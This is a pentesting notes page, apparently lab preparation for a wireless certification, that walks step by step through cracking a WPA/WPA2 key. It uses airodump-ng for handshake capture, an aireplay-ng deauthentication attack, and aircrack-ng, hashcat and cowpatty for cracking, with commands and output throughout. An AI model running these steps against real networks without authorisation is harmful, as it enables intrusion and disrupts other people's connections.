Pentesting Notes
  • Home
  • 🌐Web pentesting
    • Content Discovery
    • Subdomain Enumeration
    • Authentication bypass
    • IDOR (Insecure Direct Object Reference)
    • Git repository
    • XSS
    • SSRF
    • CSRF
    • Injection
      • SQL Injection
      • Cypher injection
      • Command injection
      • Server Side Template Injection
      • NoSQL injection
      • XXE
    • FI (File Inclusion)
    • File upload
    • OAuth
    • JWT
    • CORS
    • Prototype pollution
    • Request Smuggling
  • Windows Pentesting
    • Enumerating users (No credentials)
    • Privilege Escalation
    • Post-Exploitation
    • Cross-domain enumeration
    • LDAP port (389, 636, 3268, 3269)
    • SMB port (139,445)
    • MSSQL port (1433)
    • Certificate Authority (CA)
    • Delegation attacks
    • Attacking Kerberos
    • Relay attacks
    • Bypassing Security
    • File Transfer
    • GPO (Group Policy Object)
    • Tools
      • Mimikatz
      • NetExec
      • Crackmapexec (CME)
      • Powerview
      • Bloodhound
      • Impacket
      • BloodyAD
      • Sliver C2
  • 🐧Linux Pentesting
    • Linux Privilege Esclation
    • Escape docker
    • Ansible
  • 🕊️Cross platform pivoting
    • Pivoting
  • ☁️Cloud
    • Kubernetes
    • Azure
      • Architecture
        • RBAC & ABAC roles
        • Entra ID roles
        • Entra ID - Authentication with OAuth and API's
        • Consent and Permissions
      • Service Discovery, Recon, Enumeration and Initial Access Attacks
        • Unauthenticated Recon
        • Password Spraying
        • Azure App Service
        • Azure Blob Storage
        • Phishing with Evilginx
        • Conditional Access
      • Authenticated Enumeration
        • ROADTools
        • BloodHound & AzureHound
        • Storage Accounts (database)
      • Privilege Escalation
        • Illicit Consent Grant
        • Macro enabled Word-files (Revshell)
        • Add secrets to app
        • Automation Accounts & Function Apps
        • Virtual Machines
        • Key Vault
        • ARM Deployment History
        • Enterprise Application / Service Principal
      • Lateral Movement
        • Entra ID Devices & Primary Refresh Tokens
        • Dynamic Groups
        • Application Proxy
        • Hybrid Identity
  • 🔁Reversing
    • Windows executables and DLL's
    • Linux binaries
    • Java applications
    • Android APK
  • 🛜Wireless networks
    • WPA/WPA2
    • WPS
    • WEP
    • Capative portal bypass
    • Setting up a Rogue Access Point
    • WPA Enterpise (WPA-MGT)
  • ⭐Tips and tricks
    • Tips and tricks
Powered by GitBook
On this page
  • 1. Monitor mode
  • 2. Finding target
  • 3. Dumping & getting handshake
  • 4. Re-authentication attack
  • 5. Cracking
  • Connecting to WPA2 network
  1. Wireless networks

WPA/WPA2

PreviousAndroid APKNextWPS

Last updated 6 months ago

Steps to crack the WPA/WPA2 key. We will need a WPA handshake.

1. Monitor mode

First of all check and kill with airmon-ng:

sudo airmon-ng check
sudo airmon-ng check kill

Next, we enable monitor mode:

sudo airmon-ng start wlan0
sudo airmon-ng start wlan0 <channel_id>

# scan 5ghz networks
sudo airodump-ng -b a wlan0

2. Finding target

We will now find the bssid (MAC) and essid (SSID) of our target:

sudo airodump-ng wlan0

Example output:

We found our target F0:A7:31:46:69:71 and see its using WPA2 PSK auth. We can also see its on channel 1.

3. Dumping & getting handshake

sudo airodump-ng -c 1 -w wpa2 --bssid F0:A7:31:46:69:71 wlan0

-c | channel to 1

-w for write output as wpa2

--bssid for target MAC

wlan 0 our monitor interface

We will now have to wait for a client to connect to the network or inject using a deauthorization attack. We can see one station (client) is connected 8C:EC:7B:0F:63:24.

4. Re-authentication attack

We use ‘aireplay-ng’ which is an injection attack. This forces a re-authentication packet into the wire.

┌──(kali㉿kali)-[~/offsec/oswp]
└─$ sudo aireplay-ng -0 1 -a F0:A7:31:46:69:71 -c 8C:EC:7B:0F:63:24 wlan0
13:38:20  Waiting for beacon frame (BSSID: F0:A7:31:46:69:71) on channel 1
13:38:21  Sending 64 directed DeAuth (code 7). STMAC: [8C:EC:7B:0F:63:24] [ 0| 0 ACKs]

After that we can see "WPA handshake: X" status:

We now have captured a handshake in the .cap file. We can now use aircrack to crack the PSK.

5. Cracking

Now we will run ‘aircrack-ng’ against the dump file we gathered earlier.

aircrack-ng -w list.txt  -e OSWP -b F0:A7:31:46:69:71 wpa2-01.cap

With hashcat

Convert cap to hashcat hash mode 22000

hcxpcapngtool -o hash.hc22000 -E wordlist wpa2-01.cap

Crack it

hashcat -m 22000 hash.hc22000 list.txt

With cowpatty

First generate list of hashes:

genpmk -f list.txt -d oswphashes -s OSWP

Then crack it:

cowpatty -r wpa2-01.cap -d oswphashes -s OSWP

Connecting to WPA2 network

psk.conf
network={
    ssid="wifi-mobile"
    psk="$PASSWORD"
    scan_ssid=1
    key_mgmt=WPA-PSK
    proto=WPA2
}

Then connect to wlan3 interface

wpa_supplicant -Dnl80211 -iwlan3 -c psk.conf

And get DHCP IP:

dhclient wlan3 -v

🛜